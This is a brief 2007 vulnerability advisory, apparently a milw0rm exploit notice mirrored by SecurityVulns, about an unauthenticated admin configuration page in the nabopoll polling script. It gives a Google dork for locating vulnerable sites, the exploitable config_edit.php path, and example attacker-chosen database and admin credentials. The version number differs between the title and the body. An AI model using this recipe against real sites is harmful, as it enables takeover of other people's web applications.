nabopoll 1.2 Remote Unprotected Admin Section Vulnerability

2007-02-15T00:00:00
ID SECURITYVULNS:DOC:16090
Type securityvulns
Reporter Securityvulns
Modified 2007-02-15T00:00:00

Description

By Cr@zy_King

crazy_king@eno7.org

Thakns : ApAci & Erne & Uyussman & Eno7 & Thehacker & Crackers_Child

Script : nabopoll 1.1.2

Risk : Remote Add Admin Exploit |High

Site : http://nabocorp.com/

Google Dork : inurl:"nabopoll/"

Exploit : http://target.com/nabopoll/admin/config_edit.php

Mysql Config

For Example : http://www.xxx.com/part2/nabopoll/admin/config_edit.php

Server : localhost

Login : faisy (Admin Name)

Password : h4x0r3dbyr00t ( Admin PAss)

Database : nabopoll.sql

Crazy-King.oRg & Eno7.Org

----Her .ey Vatan .�in----

milw0rm.com [2007-02-13]